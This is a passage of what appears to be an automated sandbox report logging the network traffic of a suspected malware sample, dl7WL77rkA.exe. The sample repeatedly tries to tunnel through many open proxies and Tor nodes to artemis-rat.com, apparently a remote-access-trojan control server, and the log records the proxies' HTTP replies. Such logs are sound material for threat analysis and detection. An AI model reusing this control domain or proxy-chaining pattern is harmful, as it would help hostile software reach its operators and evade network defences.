                                                                                                                                                                                                                                                            892192.168.2.55240431.43.158.10888883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.239964008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            893192.168.2.55185551.145.176.25080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.242924929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.544563055 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            894192.168.2.552456172.67.181.58803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.244400978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.398916960 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            895192.168.2.552457104.16.108.149803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.244612932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.398857117 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            896192.168.2.55240658.234.116.19781933876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.247528076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            897192.168.2.55248645.14.174.148803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.284059048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.438425064 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            898192.168.2.552414146.19.106.217123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.284425974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            899192.168.2.55246554.67.125.4531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.284425974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.458309889 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            900192.168.2.55193651.222.241.157272063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.286364079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.311305046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.423872948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.514415026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            901192.168.2.550317177.242.201.59993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.287204027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.544353008 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            902192.168.2.55242438.162.13.2731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.287358999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.698286057 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            903192.168.2.55251166.225.246.23880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.288119078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.449884892 CET731INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                                            Server: nginx/1.22.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.892338991 CET731INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                                                            Server: nginx/1.22.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 559
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.22.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            904192.168.2.552407181.12.80.21120003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.288368940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            905192.168.2.552529104.19.83.128803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.292901993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.447041035 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            906192.168.2.55023451.158.77.220163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.294285059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405044079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.501925945 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            907192.168.2.552524104.17.239.10803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.295588017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.450021029 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
